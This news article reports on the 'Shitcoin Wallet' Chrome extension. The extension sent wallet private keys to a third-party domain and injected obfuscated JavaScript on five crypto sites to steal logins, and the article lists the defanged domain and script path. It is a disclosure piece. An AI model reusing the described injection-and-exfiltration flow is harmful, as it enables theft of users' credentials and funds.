Chrome Extension Discovered To Steal Crypto-Wallets’ Private Keys

Chrome Extension Discovered To Steal Crypto-Wallets’ Private Keys

Recently, an extension in Google Chrome has been caught injecting malicious JavaScript code on web pages. This code allows the extension to steal various passwords and private keys from the internet user’s crypto wallets and cryptocurrency portals.

Badly Named with Bad Intents

The extension is rather tastelessly named Shitcoin Wallet, holding an extension ID of ckkgmccefffnbbalkmbbgebbojjogffn. The extension launched last month, or rather last year, on the 9th of December, 2019.

The introductory blog post to this extension, the group behind it describes Shitcoin Wallet as a wallet that allows users to manage Ethereum coins properly. Coupled with this, Shitcoin Wallet allows for ERC20-based tokens as well, the kind of tokens usually doled out by way of Initial Coin Offerings or ICOs.

Very Convenient, But Tarnished

This Chrome extension, if it were only benign, served an instrumental purpose. Users could install the extension and manage both ETH and its ERC-20 coins within their own web browser. Furthermore, users are capable of installing a desktop app for Windows should they wish to manage their funds outside the bounds of a browser’s higher-risk environment.

Things started to fall apart afterward, with Harry Denley being the instigator of the collapse. Denley is the Director of Security at the MyCrypto platform and discovered that the extension held malicious code inside it. It seems nothing can just be for the good of all humanity.

Denley explained that the extension was dangerous in two significant ways. The first was that any form of funds that were managed directly within the extension was at risk. This is due to the extension sending the private keys of any, and all wallets managed or created within its interface to a third party website, located at the address erc20wallet[.]tk.

The second key issue is its active code injection of Javascript code whenever a user navigates to five popular and well-known cryptocurrency management platforms. With the malicious code injected, the extension steals the private keys and login details of those platforms as well, sending it to the same third-party website.

Step By Step

A detailed analysis of the code shows the process, step-by-step. First, the user installs the extension, which then requests permission to inject more JavaScript code on 77 websites. When one of these 77 websites are accessed, the extension loads then injects another JavaScript File from https://erc20wallet[.]tk/js/content_.js. This file contains obfuscated code that activates on five other websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange. This code, in turn, logs private keys and login information that a user creates, sending it to the third-party website.

Remember, all trading carries risk. Views expressed are those of the writers only. Past performance is no guarantee of future results. The opinions expressed in this Site do not constitute investment advice and independent financial advice should be sought where appropriate. This website is free for you to use but we may receive commission from the companies we feature on this site.

About Ali Raza

A journalist, with experience in web journalism and marketing. Ali holds a master's degree in finance and enjoys writing about cryptocurrencies and fintech. Ali’s work has been published on a number of cryptocurrency publications.

Leave a Reply

Your email address will not be published. Required fields are marked *